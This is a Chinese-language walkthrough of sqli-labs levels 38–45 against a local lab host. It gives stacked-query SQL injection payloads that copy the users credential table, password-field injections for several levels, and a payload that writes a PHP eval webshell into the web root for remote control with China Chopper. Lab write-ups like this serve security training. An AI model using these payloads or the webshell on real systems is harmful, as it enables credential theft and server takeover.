less-38
前置基础知识:堆叠注入 参考链接:https://www.cnblogs.com/lcamry/p/5762905.html
实际上就是多条sql语句一起使用。
在38关源码中加入输出sql语句的代码:
第一种办法:其实直接可以使用联合查询爆出数据:
http://192.168.0.106:300/Less-38/?id=0'union select 1,2,3 --+
但是主要考的是堆叠注入,所以我们用二种办法:堆叠注入
http://192.168.0.106:300/Less-38/?id=1';create table hzk38 like users;insert into hzk38 select *from users; --+
可以发现,在数据库中已经新建了一个表,并且信息都是用户名密码。
注意:这里如果只有第一句sql语句,他新建的表里面是没有任何信息的,只是模仿了users表的结构
参考链接:https://blog.csdn.net/qi95719/article/details/60883148
less-39
id=1
一样的道理,只是闭合sql语句不同:http://192.168.0.106:300/Less-39/?id=1;create table hzk39 like users;insert into hzk39 select *from users; --+
less-40
id=(‘1’),并且错误不回显
一样的道理,只是闭合sql语句不同:http://192.168.0.106:300/Less-40/?id=1‘);create table hzk40 like users;insert into hzk40 select *from users; --+
less-41
id=1,并且错误不回显
一样的道理,只是闭合sql语句不同:http://192.168.0.106:300/Less-41/?id=1;create table hzk41 like users;insert into hzk41 select *from users; --+
less-42
这一关与之前的二次注入类似。但是这次用的是堆叠注入的方式。
观察源码:
$username = mysqli_real_escape_string($con1, $_POST["login_user"]);
$password = $_POST["login_password"];
此时的sql为: "SELECT * FROM users WHERE username='$username' and password='$password'"
里面的password没有经过过滤,并且是单引号进行包裹,所以在这进行构造,注入之前可以现在浏览器把password的type改成明文格式方便观察:
a';create table hzk42 like users;insert into hzk42 select *from users; #
less-43
与42关基本一样。区别在:id=(’1‘)
password构造语句:a');create table hzk43 like users;insert into hzk43 select *from users; #
less-44
与42关基本一样。区别在:没有回显信息 id=’1‘
password构造语句:a';create table hzk44 like users;insert into hzk44 select *from users; #
less-45
与42关基本一样。区别在:没有回显信息 id=(’1‘)
password构造语句:a');create table hzk45 like users;insert into hzk45 select *from users; #
注意:如果你做这几关数据库乱了,可以直接在sqli-labs首页第一行重置数据库:
堆叠注入的另一种打开方式:(less38-45的第二种办法)
堆叠注入写入一句话木马:以45关为例
passqord注入语句:a’);select '<?php @eval($_POST[“hzk”]);?>' into outfile ‘C:\PhpStudy\PHPTutorial\WWW\sqli-labs\Less-45\mm.php’ #
然后用中国菜刀就能获得权限:
另外:
这几关的注入提示语句:哈哈哈
